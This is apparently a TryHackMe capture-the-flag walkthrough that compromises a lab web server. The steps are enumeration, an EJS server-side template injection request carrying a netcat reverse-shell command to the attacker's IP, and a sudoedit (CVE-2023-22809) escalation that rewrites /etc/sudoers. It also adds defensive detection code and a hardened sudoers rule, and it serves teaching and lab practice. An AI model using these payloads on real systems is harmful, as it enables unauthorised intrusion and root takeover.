![[5f9c7574e201fe31dad228fc-1726214297023 1.png]]

# TryHackMe Mr. Robot-themed CTF

### Room Link: https://tryhackme.com/r/room/whiterose

Starting off, we are provided with some possible credentials by the room author. These will come in handy later.

`Olivia Cortez:olivi8`

## Enumeration

Initial Nmap scan. SSH (port 22) and HTTP (port 80) are the only two open ports.

```shell
root@ip-10-10-195-163:~# nmap -sC -sV -T4 10.10.61.90
Starting Nmap 7.60 ( https://nmap.org ) at 2024-10-31 04:08 GMT
Nmap scan report for ip-10-10-61-90.eu-west-1.compute.internal (10.10.61.90)
Host is up (0.0078s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b9:07:96:0d:c4:b6:0c:d6:22:1a:e4:6c:8e:ac:6f:7d (RSA)
|   256 ba:ff:92:3e:0f:03:7e:da:30:ca:e3:52:8d:47:d9:6c (ECDSA)
|_  256 5d:e4:14:39:ca:06:17:47:93:53:86:de:2b:77:09:7d (EdDSA)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 02:CE:BB:ED:21:A7 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

I ran an additional Nmap scan just to confirm that no other ports were open on the target.

```shell
root@ip-10-10-195-163:~# nmap -sS -p- -n -Pn --min-rate=9362 10.10.61.90
Starting Nmap 7.60 ( https://nmap.org ) at 2024-10-31 04:11 GMT
Nmap scan report for 10.10.61.90
Host is up (0.00078s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 02:CE:BB:ED:21:A7 (Unknown)
```

Attempting to visit the site running on Port 80 at ==hxxp://10.10.195.163== results in a redirect to ==hxxp://cyprusbank.thm/==. We next add this entry to the /etc/hosts file so we can access the webpage.

![[whiterosewebpage.jpg]]

The next step was to fuzz for possible hidden or exposed web server directories using ffuf.
```shell
root@ip-10-10-195-163:~# ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.61.90/FUZZ

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.61.90/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

```

Following this, using the credentials provided to us on the room page, I decided to go for the low-hanging fruit and attempted to log in via SSH, which was unsuccessful.

```shell
root@ip-10-10-195-163:~# ssh "Olivia Cortez"@10.10.61.90
The authenticity of host '10.10.61.90 (10.10.61.90)' can't be established.
ECDSA key fingerprint is SHA256:QkIJ0yGIYzHBrE9TwbpkPzvqv//FiqyaoC979YHjslY.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.61.90' (ECDSA) to the list of known hosts.
Olivia Cortez@10.10.61.90's password:
```

Additional fuzzing for possible subdomains (virtual hosts) of the cyprusbank.thm domain, filtering out the 57-byte response that unmatched hostnames return.
```shell
root@ip-10-10-122-175:~# ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.cyprusbank.thm" -u http://cyprusbank.thm -fs 57

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1
________________________________________________

 :: Method           : GET
 :: URL              : http://cyprusbank.thm
 :: Wordlist         : FUZZ: /usr/share/wordlists/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.cyprusbank.thm
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response size: 57
________________________________________________

www                     [Status: 200, Size: 252, Words: 19, Lines: 9]
admin                   [Status: 302, Size: 28, Words: 4, Lines: 1]
:: Progress: [100000/100000] :: Job [1/1] :: 2785 req/sec :: Duration: [0:00:13] :: Errors: 0 ::
root@ip-10-10-122-175:~#
```

I added the newly discovered subdomains to the /etc/hosts file. Below is a resource to assist with enumerating vhosts and adding them to your hosts file.

https://www.freecodecamp.org/news/virtual-host-enumeration-tutorial/

```shell
root@ip-10-10-122-175:~# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 tryhackme.lan tryhackme
10.10.145.36 cyprusbank.thm
10.10.145.36 www.cyprusbank.thm
10.10.145.36 admin.cyprusbank.thm

# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
```

The ==www.cyprusbank.thm== subdomain serves the same page as the original site. The ==admin.cyprusbank.thm== subdomain, however, redirects us to a login page, from which we can log in using the credentials provided to us at the beginning of the exercise.
![[loginpage.jpg]]

Enumeration of the /messages/ directory reveals more hidden chat messages containing working credentials for the admin user.

`http://admin.cyprusbank.thm/messages/?c=5`

`http://admin.cyprusbank.thm/search?name=Tyrell+Wellick`

I obtained the admin user credentials by changing the "c=" parameter from 5 to 10.

```
User: Gayle Bev
Password: p~]P@5!6;rs558:q
```

The admin user gives us access to the customer password reset screen. I then attempted to fuzz the /settings endpoint for additional accepted (and potentially interesting) parameters.

```shell
ffuf -u 'http://admin.cyprusbank.thm/settings' -X POST -H 'Content-Type: application/x-www-form-urlencoded' -H 'Cookie: connect.sid=s%3A8NHTNQ85X-ubUye6rk1kErFlBfKsDYk4.UZBdo4KJXoAMneRXKXi1pSdr6lttgPdqBm0m6SH%2F7oI' -mc all -d 'name=test&password=test&FUZZ=test' -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-small-words-lowercase.txt -t 100 -fs 2098
```

## Initial Access

#### <u>Note:</u>

This CTF involves exploiting a template engine to achieve Server-Side Template Injection (SSTI), a vulnerability class I was a bit unfamiliar with and which required some additional studying on my end. I added a couple of links below as memory refreshers on the vulnerability itself, along with techniques for detecting it on a target and exploiting it.

#### Reading:

https://portswigger.net/web-security/server-side-template-injection

https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection

Opening up Burp Suite, we inspect the request made to the admin.cyprusbank.thm/settings page to determine which template engine the web server is running. We can see that it is running "EJS", a JavaScript templating engine. Googling for this template engine and any recent vulnerabilities, we come across CVE-2022-29078.
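To make the root cause of CVE-2022-29078 concrete, here is an added illustration (my own code, not the room's or the target application's) of how a form field named `settings[view options][outputFunctionName]` becomes a nested object once an Express body parser with bracket notation handles it, how EJS versions before 3.1.7 then treat it as a render option, and how the detection and the allowlist mitigation look on the server side. The sample body is constructed; the field names `name` and `password` are taken from the fuzzing request above.

```javascript
// Added illustration, not the room's or the target app's code; assumes an Express app rendering with EJS < 3.1.7.

// EJS options that are spliced into generated template code or change escaping/delimiters;
// none of them may ever come from the request.
const CODE_AFFECTING_EJS_OPTIONS = new Set([
  "outputFunctionName", "localsName", "destructuredLocals", "escapeFunction",
  "delimiter", "openDelimiter", "closeDelimiter", "client",
]);

// Minimal bracket-notation parser (what body-parser's extended mode does):
// "a[b][c]=v" -> { a: { b: { c: "v" } } }. Array syntax "a[]" is ignored here.
function parseFormBody(body) {
  const decode = (s) => decodeURIComponent(s.replace(/\+/g, " "));
  const out = {};
  for (const pair of body.split("&")) {
    if (!pair) continue;
    const eq = pair.indexOf("=");
    const key = decode(eq === -1 ? pair : pair.slice(0, eq));
    const val = decode(eq === -1 ? "" : pair.slice(eq + 1));
    const path = key.split(/[\[\]]/).filter(Boolean);
    let node = out;
    for (const seg of path.slice(0, -1)) {
      if (typeof node[seg] !== "object" || node[seg] === null) node[seg] = {};
      node = node[seg];
    }
    node[path[path.length - 1]] = val;
  }
  return out;
}

// Detection: EJS renderFile() copies opts.settings["view options"] onto its own options,
// so a code-affecting key under that path in request data is an injection attempt.
function findInjectedViewOptions(parsedBody) {
  const viewOpts = parsedBody?.settings?.["view options"];
  if (!viewOpts || typeof viewOpts !== "object") return [];
  return Object.keys(viewOpts).filter((k) => CODE_AFFECTING_EJS_OPTIONS.has(k));
}

// Mitigation: never hand req.body to res.render(); copy only the fields the
// template needs, so a "settings" key can never reach EJS.
function pickRenderLocals(parsedBody, allowed = ["name", "password"]) {
  return Object.fromEntries(
    allowed.filter((k) => k in parsedBody).map((k) => [k, parsedBody[k]]));
}

// Constructed sample body with the key shape of the exploit request; the command
// from the write-up is replaced by an inert marker.
const SAMPLE_BODY = "name=a&password=bbbb&settings[view%20options][outputFunctionName]=x;INERT;s";

console.log(findInjectedViewOptions(parseFormBody(SAMPLE_BODY))); // [ 'outputFunctionName' ]
```

Running the detector over request logs of a vulnerable deployment flags exactly the bodies that carry a `settings[view options]` path, while the allowlist shows why a fixed `res.render()` call never sees it.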
![[Screenshot 2024-11-05 191915.png]]

Reading up on this vulnerability: passing unrestricted render options through the `view options` setting of `renderFile` makes it possible to inject code via `outputFunctionName`. There is a PoC provided in the article below.

https://security.snyk.io/vuln/SNYK-JS-EJS-2803307

```http
POST /settings HTTP/1.1
Host: admin.cyprusbank.thm
Content-Length: 161
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://admin.cyprusbank.thm
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://admin.cyprusbank.thm/settings
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: connect.sid=s%3AenirWqBT7ALAvSv3svTuMhTFFsaI5OZ2.iX%2Fw9tb%2F%2F17Af7FZ7OcS16I6jwsp0qwTc0sl1M%2Fa7Ts
Connection: close

name=a&password=bbbb&settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('busybox nc 10.10.147.205 1337 -e sh');s
```

From here, I used RevShells to create a simple Netcat reverse shell to be used in the request parameter. After configuring a Netcat listener on my attacker machine, I received a connection from the web server and subsequently upgraded to an interactive shell with Python.

https://www.revshells.com/

```shell
root@ip-10-10-147-205:~# nc -lvnp 1337
Listening on [0.0.0.0] (family 0, port 1337)
Connection from 10.10.40.139 60538 received!
python3 -c 'import pty; pty.spawn("/bin/bash")'
web@cyprusbank:~/app$
```

## Privilege Escalation

Even after attempting to upgrade it, the initial shell we were given would not let me modify the admin.cyprusbank.thm entry in Nano or Vim without crashing the shell.
I have included a helpful resource below which might help you with spawning your own upgraded shell.

https://0xmrmasry.medium.com/upgrading-simple-shells-to-fully-interactive-ttys-eeeea1e6654e

```shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
# press Ctrl+Z here to background the shell, then on the attacker side:
stty raw -echo; fg
export TERM=xterm
```

Results of running `sudo -l` on the target machine. We are allowed to run the `sudoedit` command on the target as root.

```shell
web@cyprusbank:~/app$ sudo -l
sudo -l
Matching Defaults entries for web on cyprusbank:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET",
    env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH",
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass

User web may run the following commands on cyprusbank:
    (root) NOPASSWD: sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm
web@cyprusbank:~/app$
```

Googling for *sudoedit* privilege escalation exploits, I came across a few different resources which provide additional documentation for this Linux local privilege escalation vulnerability along with a few examples of how it can be exploited.

https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf

https://roadtooscp.medium.com/sudoedit-local-privilege-escalation-vulnerability-cve-2023-22809-23ad28e3c70

**Explanation in-context:** Essentially, `sudoedit` allows users to choose their editor using environment variables such as `SUDO_EDITOR`, `VISUAL`, or `EDITOR`. Since the values of these variables can contain not only the editor itself but also arguments to pass to it, `sudo` uses `--` while parsing them to separate the editor and its arguments from the files to open for editing. This means that by placing a `--` argument in the editor environment variable, we can force it to open files other than those allowed by the `sudoedit` rule we are permitted to run. Consequently, since we can execute `sudoedit` as `root` with `sudo`, we can edit any file we want as `root`.
To use this vulnerability for privilege escalation, there are many files we could write to. In this case, we can simply choose to write to the `/etc/sudoers` file to grant ourselves full `sudo` privileges.

**Exploiting the vulnerability.**

```shell
web@cyprusbank:~/app$ export EDITOR="nano -- /etc/sudoers"
web@cyprusbank:~/app$ sudo sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm
```

Adding the following line to the sudoers file will grant the current user full sudo privileges:

*web ALL=(ALL) NOPASSWD: ALL*

Result of running `sudo -l` after adding the desired rule in the Nano session we were given:

```shell
web@cyprusbank:~/app$ sudo -l
Matching Defaults entries for web on cyprusbank:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET",
    env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH",
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass

User web may run the following commands on cyprusbank:
    (root) NOPASSWD: sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm
    (ALL) NOPASSWD: ALL
```

Running `sudo su -` allowed us to finally upgrade to the root user. Run the following command to acquire the root flag.

```shell
root@cyprusbank:~# cat /root/root.txt
```

Root flag acquired.
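A remediation note added here, not part of the original write-up. CVE-2023-22809 affects sudo 1.8.0 through 1.9.12p1 and is fixed in 1.9.12p2; where upgrading is not immediately possible, the sudo project's advisory workaround is to strip the editor variables for `sudoedit` rules, which is what stops the `--` trick above. The first rule below is my reconstruction of the sudoers line behind the `sudo -l` output (the actual file is not shown in the write-up); the hardened form follows it.

```sudoers
# As found (reconstructed from "sudo -l"): on sudo < 1.9.12p2 the user's EDITOR/VISUAL/SUDO_EDITOR
# are honored, so a value like "nano -- /etc/sudoers" redirects the edit to another file.
web ALL=(root) NOPASSWD: sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm

# Hardened (sudo advisory workaround for versions before 1.9.12p2): remove the editor
# variables from the environment of every sudoedit command, so only the configured
# default editor is used and only the listed file can be opened.
Cmnd_Alias SUDOEDIT = sudoedit
Defaults!SUDOEDIT env_delete+="SUDO_EDITOR VISUAL EDITOR"
web ALL=(root) NOPASSWD: sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm
```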